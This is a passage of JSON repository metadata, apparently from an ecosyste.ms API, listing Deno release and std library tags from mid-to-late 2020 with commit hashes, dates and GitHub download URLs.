08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg